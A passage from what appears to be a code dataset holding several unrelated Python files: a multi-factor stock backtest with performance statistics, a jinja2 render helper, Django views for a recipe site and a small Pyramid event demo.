Filter_Vol_Signal_Sort} \n Filter_Vol_Signal_df = pd.DataFrame(frame)\n Filter_Vol_Signal_df['Vol Z Score'] = stats.zscore(Filter_Vol_Signal_Sort)\n Filter_Vol_Signal_df = Filter_Vol_Signal_df.reset_index()\n \n Data_for_Portfolio_master_filter = Data_for_Portfolio_master_filter.merge(Filter_Vol_Signal_df, how = 'inner', on = ['ticker']) \n\n ###### TREND FACTOR #####\n \n tickers_trend = list(Sector_stock_prices_vol_df_1_wide.columns)\n \n #This is a very simply way to see how much a stock is in a trend up or down\n #You could easily make this more complex/robust but it would cost you in \n #execution time\n df_sma_50 = Sector_stock_prices_vol_df_1_wide.rolling(50).mean()\n df_sma_100 = Sector_stock_prices_vol_df_1_wide.rolling(100).mean()\n df_sma_150 = Sector_stock_prices_vol_df_1_wide.rolling(150).mean()\n df_sma_200 = Sector_stock_prices_vol_df_1_wide.rolling(200).mean()\n \n #Get the same date for vol measurement near rebalance date\n Filter_Date_Trend = final_trade_date.strftime('%Y-%m-%d')\n Filter_Trend_Signal_50 = df_sma_50.loc[Filter_Date_Trend]\n Filter_Trend_Signal_100 = df_sma_100.loc[Filter_Date_Trend]\n Filter_Trend_Signal_150 = df_sma_150.loc[Filter_Date_Trend]\n Filter_Trend_Signal_200 = df_sma_200.loc[Filter_Date_Trend]\n \n Price_Signal = Sector_stock_prices_vol_df_1_wide.loc[Filter_Date_Trend]\n \n Filter_SMA_Signal_df = pd.DataFrame(tickers_trend)\n Filter_SMA_Signal_df = Filter_SMA_Signal_df.rename(columns={0: \"ticker\"})\n Filter_SMA_Signal_df['SMA 50 position'] = np.where(Price_Signal > Filter_Trend_Signal_50,1,0)\n Filter_SMA_Signal_df['SMA 100 position'] = np.where(Price_Signal > Filter_Trend_Signal_100,1,0)\n Filter_SMA_Signal_df['SMA 150 position'] = np.where(Price_Signal > Filter_Trend_Signal_150,1,0)\n Filter_SMA_Signal_df['SMA 200 position'] = np.where(Price_Signal > Filter_Trend_Signal_200,1,0)\n Filter_SMA_Signal_df['Trend Score'] = np.mean(Filter_SMA_Signal_df, axis=1)\n Data_for_Portfolio_master_filter = Data_for_Portfolio_master_filter.merge(Filter_SMA_Signal_df[['ticker','Trend Score']], how = 'inner', on = ['ticker'])\n \n ###### MOMENTUM FACTOR #####\n \n tickers_momentum = list(Sector_stock_prices_vol_df_1_wide.columns)\n #from the academic literature of 12 months - 1 month momentum \n df_mom_11_months = Sector_stock_prices_vol_df_1_wide.pct_change(22*11)\n \n Filter_Date_Mom = Date_to_execute_trade_plus1 - pd.tseries.offsets.BusinessDay(24)\n Filter_Date_Mom_trim = final_trade_date.strftime('%Y-%m-%d')\n Filter_Mom_Signal = df_mom_11_months.loc[Filter_Date_Mom_trim]\n \n Filter_MOM_df = pd.DataFrame(tickers_momentum)\n Filter_MOM_df = Filter_MOM_df.rename(columns={0: \"ticker\"})\n Filter_MOM_df['Percent Change'] = Filter_Mom_Signal.values\n \n Filter_MOM_df = Filter_MOM_df.replace([np.inf, -np.inf], np.nan)\n Filter_MOM_df = Filter_MOM_df.dropna()\n Filter_MOM_df['Momentum Score'] = stats.zscore(Filter_MOM_df['Percent Change'])\n \n Data_for_Portfolio_master_filter = Data_for_Portfolio_master_filter.merge(Filter_MOM_df[['ticker','Momentum Score']], how = 'inner', on = ['ticker'])\n \n ### Create Composite Score from factors ###\n \n #Because we made all the factors with a z score each factor should have equal\n #weight in the composite. You could consider changing the weights based on \n #historical statistical significance or whatever else seems reasonable\n \n #This particular scoring system only invests in companies with \n #positive trend/momentum after ranking by the other factors\n Data_for_Portfolio_master_filter['Total Score'] = \\\n Data_for_Portfolio_master_filter['Valuation Score'] + \\\n Data_for_Portfolio_master_filter['Quality Score'] + \\\n Data_for_Portfolio_master_filter['Shareholder Yield Score'] - \\\n Data_for_Portfolio_master_filter['Vol Z Score'] * \\\n (Data_for_Portfolio_master_filter['Momentum Score'] + \\\n Data_for_Portfolio_master_filter['Trend Score'])\n \n number_firms = Data_for_Portfolio_master_filter.shape\n number_firms = number_firms[0]\n \n firms_in_percentile = np.round(Percentile_split * number_firms)\n \n Data_for_Portfolio_master_filter = \\\n Data_for_Portfolio_master_filter.sort_values('Total Score', ascending=False)\n \n ##### How to Filter Companies ####\n \n # Filter so pick the best and worst company from each sector # \n filtered_df = Data_for_Portfolio_master_filter.copy()\n filtered_df2 = Data_for_Portfolio_master_filter.copy()\n\n Sector_stocks_cheapest = \\\n filtered_df.drop_duplicates(['sector'], keep='first').groupby('ticker').head()\n Sector_stocks_expensive = \\\n filtered_df2.drop_duplicates(['sector'], keep='last').groupby('ticker').head()\n \n ###### OR ####### \n \n #filter the dataset by the desired number of companies for expensive and cheap\n # Sector_stocks_cheapest = Data_for_Portfolio_master_filter.iloc[:int(Companies_in_Portfolio)]\n # Sector_stocks_expensive = Data_for_Portfolio_master_filter.iloc[int(-Companies_in_Portfolio):]\n \n ###### OR #######\n \n #filter the dataset by the percentile for expensive and cheap\n #Sector_stocks_cheapest = Data_for_Portfolio_master_filter.iloc[:int(firms_in_percentile)]\n #### If you want to create top half portfolio and bottom half ###\n #left_over_firms = number_firms - firms_in_percentile\n #Sector_stocks_expensive = Data_for_Portfolio_master_filter.iloc[int(-left_over_firms):]\n #Sector_stocks_expensive = Data_for_Portfolio_master_filter.iloc[int(-firms_in_percentile):]\n \n #convert the list of unique tickers to a list\n Sector_stocks_cheapest_tickers = Sector_stocks_cheapest['ticker'].tolist()\n Sector_stocks_expensive_tickers = Sector_stocks_expensive['ticker'].tolist()\n \n #keep track of stocks, Tranche, and turnover\n Turnover = pd.DataFrame({'Date':Date,\n 'Tickers':Sector_stocks_cheapest_tickers,\n 'Sector':Sector_stocks_cheapest['sector'].tolist(),\n 'Weight':1/len(Sector_stocks_cheapest_tickers)})\n Portfolio_Turnover = Portfolio_Turnover.append(Turnover)\n \n #filter the price date by the list of tickers\n Sector_stock_prices_cheapest = Sector_stock_prices.loc\\\n [Sector_stock_prices['ticker'].isin(Sector_stocks_cheapest_tickers)]\n Sector_stock_prices_expensive = Sector_stock_prices.loc\\\n [Sector_stock_prices['ticker'].isin(Sector_stocks_expensive_tickers)]\n \n #get date, ticker, and close(adjusted) columns\n Sector_stock_prices_cheapest = Sector_stock_prices_cheapest.iloc[:, [0, 1, 5]]\n Sector_stock_prices_expensive = Sector_stock_prices_expensive.iloc[:, [0, 1, 5]]\n \n #add a quarter to reporting so no lookahead bias\n Date_to_execute_trade = pd.to_datetime(Date) + pd.tseries.offsets.QuarterEnd()\n Date_to_execute_trade_plus1 = Date_to_execute_trade + pd.tseries.offsets.BusinessDay(1)\n final_trade_date = Date_to_execute_trade_plus1 - pd.tseries.offsets.BusinessDay(1)\n \n #add 4 quarters to end so the rebalance will be annual\n end_date = Date_to_execute_trade + pd.tseries.offsets.QuarterEnd(4)\n final_trade_date_trim = final_trade_date.strftime('%Y-%m-%d')\n end_date_trim = end_date.strftime('%Y-%m-%d')\n start_date = final_trade_date_trim\n end_date = end_date_trim\n \n #make data from long format to wide and fill in Na's with O\n Sector_stock_prices_cheapest_wide = Sector_stock_prices_cheapest.pivot\\\n (index='date', columns='ticker', values='close')\n Sector_stock_prices_cheapest_wide = \\\n Sector_stock_prices_cheapest_wide.fillna(0)\n Sector_stock_prices_expensive_wide = \\\n Sector_stock_prices_expensive.pivot(index='date', columns='ticker', values='close')\n Sector_stock_prices_expensive_wide = \\\n Sector_stock_prices_expensive_wide.fillna(0)\n \n #This is how to handle if there are no firms in the cheap or empty dataframe.\n #As it stands now, this won't happen, but when in early development\n #There were times when no companies meant the fundamental filter\n if Sector_stock_prices_cheapest_wide.empty == True:\n days = price_index\n number_days = len(price_index)\n filler_returns = np.repeat(0, number_days)\n df = pd.DataFrame({'Days': days, 'Returns': filler_returns})\n df = df.set_index('Days')\n Sector_stock_prices_cheapest_wide = df\n else:\n pass\n \n if Sector_stock_prices_expensive_wide.empty == True:\n days = price_index\n number_days = len(price_index)\n filler_returns = np.repeat(0, number_days)\n df = pd.DataFrame({'Days': days, 'Returns': filler_returns})\n df = df.set_index('Days')\n Sector_stock_prices_expensive_wide = df\n else:\n pass\n \n ########### High Factor Price Returns and Portfolio #########\n \n #pick out start date and end date for calculating equity returns\n Sector_stock_prices_cheapest_wide.loc[start_date:end_date].head()\n Sector_stock_prices_cheapest_wide = \\\n Sector_stock_prices_cheapest_wide.loc[start_date:end_date]\n Cheap_returns_daily = Sector_stock_prices_cheapest_wide.pct_change()\n \n #if there are no assets then the Cheap_returns_daily become NaN and in that\n #case we will need to by pass the normal operations and just keep the dataframe\n x = np.logical_and\\\n (Cheap_returns_daily.shape[1] == 1, Cheap_returns_daily.isnull().all() == True)\n \n if x[0] == True:\n Cheap_returns_daily = Sector_stock_prices_cheapest_wide\n else:\n #get rid of first NaN row\n Cheap_returns_daily = Cheap_returns_daily.dropna(how='all')\n \n #get rid of stocks that have no trading\n Cheap_returns_daily = Cheap_returns_daily.dropna(axis='columns')\n \n column_length = Cheap_returns_daily.shape[1] #if no column\n \n ###### Portfolio Securities Weighting / Optimization #####\n \n #This is where you could add your own portfolio optimization\n \n ##### Equal Weight ####\n \n #equal weight based on number of stocks\n portfolio_weights = np.repeat(1/column_length, column_length)\n \n ### OR ###\n \n #### Market Cap Weight ####\n # Cheap_returns_tickers = Cheap_returns_daily.columns.tolist()\n # Cheap_returns_tickers_fundamentals = Sector_stocks_cheapest.loc[Sector_stocks_cheapest['ticker'].isin(Cheap_returns_tickers)]\n # Cheap_returns_tickers_fundamentals['weights']= Cheap_returns_tickers_fundamentals['marketcap'] / Cheap_returns_tickers_fundamentals['marketcap'].sum()\n # portfolio_weights = np.array(Cheap_returns_tickers_fundamentals['weights'])\n \n ### OR ###\n \n ### Score Confidence Weight ###\n # Cheap_returns_tickers = Cheap_returns_daily.columns.tolist()\n # Cheap_returns_tickers_fundamentals = Sector_stocks_cheapest.loc[Sector_stocks_cheapest['ticker'].isin(Cheap_returns_tickers)]\n # Cheap_returns_tickers_fundamentals['weights']= Cheap_returns_tickers_fundamentals['Total Score'] / Cheap_returns_tickers_fundamentals['Total Score'].sum()\n # portfolio_weights = np.array(Cheap_returns_tickers_fundamentals['weights'])\n \n #use dot product to calculate portfolio returns\n Cheap_returns_daily['portfolio return'] = Cheap_returns_daily.dot(portfolio_weights)\n Portfolio_returns_Cheap = Cheap_returns_daily['portfolio return']\n Portfolio_returns_Cheap = pd.DataFrame(Portfolio_returns_Cheap)\n \n ####### Expensive Stock Price Returns and Portfolio ########\n \n Sector_stock_prices_expensive_wide = \\\n Sector_stock_prices_expensive_wide.loc[start_date:end_date]\n Expensive_returns_daily = Sector_stock_prices_expensive_wide.pct_change()\n \n #if there are no assets then the Cheap_returns_daily become NaN and in that\n #case we will need to by pass the normal operations and just keep the dataframe\n x = np.logical_and(Expensive_returns_daily.shape[1] == 1, \\\n Expensive_returns_daily.isnull().all() == True)\n \n if x[0] == True:\n Expensive_returns_daily = Sector_stock_prices_expensive_wide\n else:\n #get rid of first NaN row\n Expensive_returns_daily = Expensive_returns_daily.dropna(how='all')\n \n #get rid of stocks that have no trading\n Expensive_returns_daily = Expensive_returns_daily.dropna(axis='columns')\n \n column_length = Expensive_returns_daily.shape[1]\n #here you could replace with different ocptimization techniques\n \n #equal weight based on number of stocks\n portfolio_weights = np.repeat(1/column_length, column_length)\n \n ### OR ###\n \n #### Market Cap Weight ####\n # Cheap_returns_tickers = Cheap_returns_daily.columns.tolist()\n # Cheap_returns_tickers_fundamentals = Sector_stocks_cheapest.loc[Sector_stocks_cheapest['ticker'].isin(Cheap_returns_tickers)]\n # Cheap_returns_tickers_fundamentals['weights']= Cheap_returns_tickers_fundamentals['marketcap'] / Cheap_returns_tickers_fundamentals['marketcap'].sum()\n # portfolio_weights = np.array(Cheap_returns_tickers_fundamentals['weights'])\n \n ### OR ###\n \n ### Score Confidence Weight ###\n # Expensive_returns_tickers = Expensive_returns_daily.columns.tolist()\n # Expensive_returns_tickers_fundamentals = Sector_stocks_expensive.loc[Sector_stocks_expensive['ticker'].isin(Expensive_returns_tickers)]\n # Expensive_returns_tickers_fundamentals['weights']= -Expensive_returns_tickers_fundamentals['Total Score'] / Expensive_returns_tickers_fundamentals['Total Score'].sum()\n # portfolio_weights = np.array(Expensive_returns_tickers_fundamentals['weights'])\n \n #use dot product to calculate portfolio returns\n Expensive_returns_daily['portfolio return'] = Expensive_returns_daily.dot(portfolio_weights)\n Portfolio_returns_Expensive = Expensive_returns_daily['portfolio return']\n Portfolio_returns_Expensive = pd.DataFrame(Portfolio_returns_Expensive)\n \n merged = pd.merge(Portfolio_returns_Cheap, Portfolio_returns_Expensive, \\\n how='inner', left_index=True, right_index=True)\n merged['L/S'] = merged.iloc[:, 0]-merged.iloc[:, 1]\n portfolio_returns = portfolio_returns.append(merged)\n\nportfolio_returns.columns = ['High Factor', 'Low Factor', 'LS']\n\n############### Create the Equal Weight Portfolio Benchmark ###############\n#Equal Weight Portfolio as Benchmark\n\nf_date = datetime.date(2012, 9, 30)\nl_date = datetime.date(2020, 9, 30)\ndelta = l_date - f_date\nquarters_delta = np.floor(delta.days/(365/4))\nquarters_delta = int(quarters_delta)\nfirst_quarter = str('2012-09-30')\nequal_weight_returns = pd.DataFrame()\nData_for_Portfolio_master = pd.DataFrame(Data_for_Portfolio)\n\nfor i in range(0, quarters_delta, 1):\n\n Date = pd.to_datetime(first_quarter) + pd.tseries.offsets.QuarterEnd(i)\n Date = Date.strftime('%Y-%m-%d')\n Data_for_Portfolio_master_filter = \\\n Data_for_Portfolio_master.loc[Data_for_Portfolio_master\\\n ['calendardate'] == Date]\n Sector_stocks = pd.DataFrame(Data_for_Portfolio_master_filter)\n Sector_stocks_tickers = Sector_stocks['ticker'].tolist()\n\n Sector_stock_prices_trim = Sector_stock_prices.loc\\\n [Sector_stock_prices['ticker'].isin(Sector_stocks_tickers)]\n\n #get date, ticker, and close(adjusted) columns\n Sector_stock_prices_trim = Sector_stock_prices_trim.iloc[:, [0, 1, 5]]\n\n #add a quarter to reporting so no lookahead bias\n Date_to_execute_trade = pd.to_datetime(Date) + pd.tseries.offsets.QuarterEnd()\n Date_to_execute_trade_plus1 = Date_to_execute_trade + pd.tseries.offsets.BusinessDay(1)\n final_trade_date = Date_to_execute_trade_plus1 - pd.tseries.offsets.BusinessDay(1)\n\n #add 4 quarters to end so the rebalance will be annual\n end_date = Date_to_execute_trade + pd.tseries.offsets.QuarterEnd()\n final_trade_date_trim = final_trade_date.strftime('%Y-%m-%d')\n end_date_trim = end_date.strftime('%Y-%m-%d')\n start_date = final_trade_date_trim\n end_date = end_date_trim\n\n #make data from long format to wide\n Sector_stock_prices_wide = Sector_stock_prices_trim.pivot\\\n (index='date', columns='ticker', values='close')\n Sector_stock_prices_wide = Sector_stock_prices_wide.fillna(0)\n\n #pick out start date and end date for calculating equity returns\n Sector_stock_prices_wide = Sector_stock_prices_wide.loc[start_date:end_date]\n\n returns_daily = Sector_stock_prices_wide.pct_change()\n #get rid of first NaN row\n returns_daily = returns_daily.dropna(how='all')\n #get rid of if no column\n returns_daily = returns_daily.dropna(axis='columns')\n column_length = np.where(returns_daily.shape[1] == 0, 1, returns_daily.shape[1])\n\n portfolio_weights = np.repeat(1/column_length, column_length)\n returns_daily['portfolio return'] = returns_daily.dot(portfolio_weights)\n EW_returns = returns_daily['portfolio return']\n EW_returns_df = pd.DataFrame(EW_returns)\n equal_weight_returns = equal_weight_returns.append(EW_returns_df)\n\n#change inf to NAs since first entry is inf\nequal_weight_returns = equal_weight_returns.replace([np.inf, -np.inf], 0)\n\nCombined_Portfolio_returns = pd.merge(equal_weight_returns, \\\n portfolio_returns, how='inner', \\\n left_index=True, right_index=True)\n\n#change inf to NAs since first entry is inf\nCombined_Portfolio_returns = Combined_Portfolio_returns.replace\\\n ([np.inf, -np.inf], 0)\n\n#Rename the columns\nCombined_Portfolio_returns = Combined_Portfolio_returns.rename\\\n (columns={\"portfolio return\": \"Equal Weight\"})\n\nCombined_Portfolio_returns.index = pd.to_datetime(Combined_Portfolio_returns.index)\n\n#create a performance chart and save for later\nportfolio_index = (1 + Combined_Portfolio_returns).cumprod()\nax = portfolio_index.plot(title='Multi-Factor Out of Sample performance')\nfig = ax.get_figure()\nCrystal_Ball_Performance_Chart = 'Multi-Factor Out of Sample Performance Chart Annual Rebal'\npath_to_file = (\n r'file here'\n )\noutput_name = path_to_file + Crystal_Ball_Performance_Chart + '.pdf'\nfig.savefig(output_name)\n\nt1 = time.time()\ntotal= t1-t0\nprint(\"It took \" + str(np.round(total/60,2)) + \" minutes to run the code\")\n#%%\n####################get risk free rate from kenneth french#####################\nlen(get_available_datasets())\n\nds = web.DataReader('F-F_Research_Data_Factors_daily', 'famafrench', start='1990-08-30')\n\nprint(ds['DESCR'])\n\nds[0].head()\n#%%\ndata = ds[0]\ndata = data.dropna()\ndata = data/100 #convert to percent returns\nRF_data = (1+data['RF']).cumprod()\n\nRF_start_date = portfolio_index.first_valid_index()\nRF_end_date = portfolio_index.last_valid_index()\n\nRF_data = pd.DataFrame(RF_data[RF_start_date:RF_end_date])\n#################Calculate Risk and Performance############################\nannualized_return(RF_data)\nRF_Ann_Return_df = annualized_return(RF_data)\nRF_Ann_Return = np.round(float(RF_Ann_Return_df.iloc[:, 1]), 4)\n\nsum(portfolio_returns['LS'])/(portfolio_returns.shape[0]/252)\n\nreturns = annualized_return(portfolio_index)\nStddev = annualized_standard_deviation(portfolio_index)\nSector_Perf = returns.merge(Stddev)\n\nSharpe_Ratios = sharpe_ratio(portfolio_index, RF_Ann_Return)\nSector_Perf = Sector_Perf.merge(Sharpe_Ratios)\n\nSortino_Ratios = sortino_ratio(portfolio_index, RF_Ann_Return)\nSector_Perf = Sector_Perf.merge(Sortino_Ratios)\n\nMax_DD = max_drawdown(portfolio_index)\n\nSector_Perf = Sector_Perf.merge(Max_DD)\n\nCalmar_Ratios = calmar_ratio(portfolio_index)\nSector_Perf = Sector_Perf.merge(Calmar_Ratios)\n\nGain_To_Pain = gain_to_pain_ratio(portfolio_index)\nSector_Perf = Sector_Perf.merge(Gain_To_Pain)\nprint(Sector_Perf)\nSector_Perf.set_index('Portfolio')\n#%%\n#Save the performance for later use\nOut_of_Sample_Performance = 'Out of Performance '\n\npath_to_file = (\n r'file_here'\n )\noutput_name = path_to_file + Out_of_Sample_Performance + '.csv'\nSector_Perf.to_csv(output_name)\n\nos.system('say \"your program has finished\"')\n#%%\n#### testing statistical significance of alpha ####\n\n#Sample Size\nN = Combined_Portfolio_returns.shape[0]\n\n#Calculate the variance to get the standard deviation\nPortfolio_Alpha = Combined_Portfolio_returns['Cheap']- Combined_Portfolio_returns['Equal Weight']\n#For unbiased max likelihood estimate we have to divide the var by N-1,\n# and therefore the parameter ddof = 1\nvar_alpha = Portfolio_Alpha.var(ddof=1)\n\n## Calculate the t-statistics\nt = (Portfolio_Alpha.mean() - 0) / np.sqrt(var_alpha/N)\n\n## Compare with the critical t-value\n#Degrees of freedom\ndf = N-1\n\n#p-value after comparison with the t\np = 1 - stats.t.cdf(t, df=df)\n\nprint(\"t = \" + str(t))\nprint(\"p = \" + str(p))\n\ncheap_array = np.array(Combined_Portfolio_returns['Cheap'].dropna())\n\nequal_weight_array = np.array(Combined_Portfolio_returns['Equal Weight'])\nnp.isnan(cheap_array).any()\nnp.isnan(equal_weight_array).any()\n## Cross Checking with the internal scipy function\nt2, p2 = stats.ttest_ind(cheap_array, equal_weight_array)\nprint(\"t = \" + str(t2))\nprint(\"p = \" + str(p2/2)) #one sided t test\n#%%\n#####Testing Statistical Significance of L/S Portfolio#########\n\n#Sample Size\nN = Combined_Portfolio_returns.shape[0]\n\n#Calculate the variance to get the standard deviation\n#For unbiased max likelihood estimate we have to divide the var by N-1,\n#and therefore the parameter ddof = 1\nvar_factor = Combined_Portfolio_returns['LS'].var(ddof=1)\n\n## Calculate the t-statistics\nt = (Combined_Portfolio_returns['LS'].mean() - 0) / np.sqrt(var_factor/N)\n\n## Compare with the critical t-value\n#Degrees of freedom\ndf = N-1\n\n#p-value after comparison with the t\np = 1 - stats.t.cdf(t, df=df)\n\nprint(\"t = \" + str(t))\nprint(\"p = \" + str(p))\n### You can see that after comparing the\n\nZEROS = [0] * N\n## Cross Checking with the internal scipy function\nt2, p2 = stats.ttest_ind(Combined_Portfolio_returns['LS'], ZEROS)\nprint(\"t = \" + str(t2))\nprint(\"p = \" + str(p2/2)) #one sided t test\n#%%\n\n","sub_path":"Multi-Factor/portfolio_multi_factor_models_rebalance_annually_public_medium_OOS.py","file_name":"portfolio_multi_factor_models_rebalance_annually_public_medium_OOS.py","file_ext":"py","file_size_in_byte":36232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"262383143","text":"import random, jinja2\n\nclass RenderEngine:\n def __init__(self):\n self.envrionment = jinja2.Environment()\n self.envrionment.globals['random'] = random\n\n def warp(self, string):\n if string.isdigit():\n return int(string)\n try:\n return float(string)\n except ValueError:\n return string\n\n def render(self, obj, **kwargs):\n if isinstance(obj, str):\n return self.render_string(obj, ** kwargs)\n\n elif isinstance(obj, (list, tuple)):\n for i, item in enumerate(obj):\n obj[i] = self.render(obj[i], ** kwargs)\n return obj\n\n elif isinstance(obj, dict):\n for key, value in obj.items():\n obj[key] = self.render(value, ** kwargs)\n return obj\n else:\n return obj\n\n def render_string(self, string, **kwargs):\n if string.startswith('@'):\n string = string.replace('@', '{{')\n string += '}}'\n\n template = self.envrionment.from_string(string)\n try:\n return self.warp(template.render(** kwargs)) \n except:\n return string","sub_path":"tools/render_engine.py","file_name":"render_engine.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"185173718","text":"from django.shortcuts import render, get_object_or_404, redirect, HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserForm\nfrom itertools import chain\nfrom .models import *\nfrom .methods import *\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.template import loader\n\n\n\ndef homepage(request):\n recipes = Recipe.objects.filter(rating__gte=70).order_by('-rating')\n recipes = recipes[:4]\n images = []\n for recipe in recipes:\n img = recipe.images.all()\n if img:\n images.append(img[0])\n else:\n images.append(Images())\n\n return render(request, 'RecipeApp/index.html', {'Recipes':recipes, 'Images':images})\n\ndef categories(request):\n return render(request, 'RecipeApp/categories.html', {})\n\n@login_required\ndef mypage(request):\n user = request.user\n cook = Cook.objects.filter(user=user)[0]\n recipes = cook.saved_recipe.all()\n images = []\n for recipe in recipes:\n img = recipe.images.all()\n if img:\n images.append(img[0])\n else:\n images.append(Images())\n return render(request, 'RecipeApp/mypage.html', {'Recipes':recipes, 'Images':images, 'Cook':cook})\n\n\n#In the methods.py file there are some methods which return the json information right now\n#this methods still have to be converted has to be converted to\ndef single(request):\n #response = searchRecipes(\"nuts\", 3, \"Italian\", \"main course\", \"milk\")\n ID = 736910\n recipe = recipeInfo(ID)\n similar_recipe = similarRecipes(ID)\n similar_images = []\n ingredients = []\n for recept in similar_recipe:\n img = recept.images.all()\n if img:\n similar_images.append(img[0])\n else:\n similar_images.append(Images())\n\n img = recipe.images.all()\n if img:\n images.append(img[0])\n else:\n images.append(Images())\n ingredients.append(list(recipe.ingredients.all()))\n\n return render(request, 'RecipeApp/single.html', {'Recipes':recipe, 'Images':images[0], \"Ingredients\":ingredients, 'similar_recipe': similar_recipe, 'similar_images': similar_images})\n\ndef random(request):\n #response = searchRecipes(\"nuts\", 3, \"Italian\", \"main course\", \"milk\")\n recipe = randomRecipe()\n images = []\n ingredients = []\n img = recipe.images.all()\n if img:\n images.append(img[0])\n else:\n images.append(Images())\n\n ingredients.append(list(recipe.ingredients.all()))\n return render(request, 'RecipeApp/single.html', {'Recipes':recipe, 'Images':images[0], \"Ingredients\":ingredients[0]})\n\ndef overview(request):\n recipes = Recipe.objects.filter()\n images = []\n ingredients = []\n for recipe in recipes:\n img = recipe.images.all()\n if img:\n images.append(img[0])\n else:\n images.append(Images())\n ingredients.append(list(recipe.ingredients.all()))\n return render(request, 'RecipeApp/overview.html', {'Recipes':recipes, 'Images':images, \"Ingredients\":ingredients})\n\ndef search_single(request,pk):\n recipe = get_object_or_404(Recipe,pk=pk)\n images = []\n ingredients = []\n img = recipe.images.all()\n if img:\n images.append(img[0])\n else:\n images.append(Images())\n\n ingredients.append(list(recipe.ingredients.all()))\n return render(request, 'RecipeApp/single.html', {'Recipes':recipe, 'Images':images[0], \"Ingredients\":ingredients[0]})\n\ndef save_favourite(request,pk):\n user = request.user\n url = request.META['HTTP_REFERER']\n cook = Cook.objects.filter(user=user)[0]\n recipe = get_object_or_404(Recipe,pk=pk)\n cook.saved_recipe.add(recipe)\n images = []\n ingredients = []\n img = recipe.images.all()\n if img:\n images.append(img[0])\n else:\n images.append(Images())\n\n ingredients.append(list(recipe.ingredients.all()))\n return render(request,'RecipeApp/single.html',{'Recipes':recipe, 'Images':images[0], \"Ingredients\":ingredients[0], 'Added':True})\n\ndef category(request,pk):\n cats = [\"vegetarian\",\"veryHealthy\",\"vegan\",\"veryPopular\"]\n c = int(pk)\n print(c)\n cate = cats[c]\n print(cate)\n cat = Category.objects.filter(name = cate, value = True)\n response = Recipe.objects.filter(categories__in=cat).order_by(\"-created_at\")[:8]\n images = []\n ingredients = []\n for recipe in response:\n img = recipe.images.all()\n if img:\n images.append(img[0])\n else:\n images.append(Images())\n ingredients.append(list(recipe.ingredients.all()))\n\n return render(request, 'RecipeApp/category.html', {'Recipes':response, 'Images':images, \"Ingredients\":ingredients, \"Title\":cate})\n\ndef search(request):\n if request.method == 'POST':\n query = request.POST.get('query')\n kitchen = request.POST.get('kitchen')\n dish = request.POST.get('dish')\n al = request.POST.get('al')\n ingredients = request.POST.get('ingredients')\n ex_ingredients = request.POST.get('exclude_ingredients')\n response = searchRecipes(query,kitchen,dish,al,ingredients,ex_ingredients)\n images = []\n ingredients = []\n for recipe in response:\n if dish!= \"none\":\n new_dish = Dish.objects.filter(name=dish)\n if not new_dish:\n new_dish = Dish.objects.create(name=dish)\n else:\n new_dish =new_dish[0]\n recipe.dish = new_dish\n if kitchen!= \"none\":\n new_country = Country.objects.filter(name=kitchen)\n if not new_country:\n new_country = Country.objects.create(name=kitchen)\n else:\n new_country = new_country[0]\n recipe.country = new_country\n img = recipe.images.all()\n if img:\n images.append(img[0])\n else:\n images.append(Images())\n ingredients.append(list(recipe.ingredients.all()))\n return render(request, 'RecipeApp/search.html', {'Recipes':response, 'Images':images, \"Ingredients\":ingredients})\n\n\n\n return render(request, 'RecipeApp/search.html', {})\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef register_view(request):\n registered = False\n error = False\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n fname = request.POST['fname']\n lname = request.POST['lname']\n email = request.POST['email']\n try: user = User.objects.create_user(username, email, password)\n except: error=True\n user.save()\n try: cook = Cook.objects.create(user = user, fname = fname, lname = lname)\n except: error=True\n registered = True\n else:\n user_form = UserForm()\n return render(request,'RecipeApp/register.html', {'error':error, 'registered': registered})\n\n@login_required\ndef logout_view(request):\n done = logout(request)\n return render(request,'RecipeApp/login.html', {'result': \"Logged OUT!\"})\n\n\ndef login_view(request):\n try:user = Cook.objects.filter(user=request.user)[0]\n except: user = None\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n if user:\n if user.is_active:\n login(request,user)\n user=Cook.objects.filter(user=user)[0]\n prev = request.META['HTTP_REFERER']\n return redirect('/mypage/')\n else:\n return render(request,'RecipeApp/login.html', {'result': \"Your account was disabled.\"})\n else:\n return render(request,'RecipeApp/login.html', {'result': \"Your username and password didn't match, please try again.\", })\n else:\n return render(request,'RecipeApp/login.html', {'user':user})\n","sub_path":"RecipeApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"221817496","text":" \nfrom wsgiref.simple_server import make_server\nfrom pyramid.config import Configurator\nfrom pyramid.events import NewRequest\nfrom pyramid.events import NewResponse\nfrom pyramid.events import subscriber\nfrom pyramid.response import Response\nfrom pyramid.view import view_config\n\n\n@view_config(\n route_name='home',\n)\ndef home(request):\n return Response('Welcome!')\n\n# 1) \n# @subscriber(NewRequest, NewResponse)\n# def mysubscriber(event):\n# print('event NewRequest/NewResponse ', event)\n\n# 2)\n@subscriber(NewRequest)\ndef mysubscriber1(event):\n print('event NewRequest ', event)\n\n# 3)\n@subscriber(NewResponse)\ndef mysubscriber2(event):\n print('event NewResponse ', event)\n\nif __name__ == '__main__':\n with Configurator() as config:\n config.add_route('home', '/')\n config.scan()\n app = config.make_wsgi_app()\n server = make_server('0.0.0.0', 6543, app)\n server.serve_forever()\n\n ","sub_path":"python/pyramid/helloWorld/server events manager.py","file_name":"server events manager.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"619637851","text":"\"\"\"Test document.\"\"\"\n# mylist = [1,2,3,4,5,6,7,8]\n#\n# def even_bool(num):\n# return num%2 == 0\n#\n# evens = filter(even_bool,mylist)\n# print(list(evens))\n\n\n###lambda expression\n# evens = filter(lambda num:num%2 == 0, mylist)\n# print(list(evens))\n\n# #str splits\n# tweet = \"Go Sports! #Sports\"\n# result = tweet.split('#')[1]\n# print(result)\n\n# #in example\n# print('x' in [1,2,3,'x'])\n\n\n# def stringBits(mystring):\n# return mystring[::2]\n#\n# print(stringBits('whats 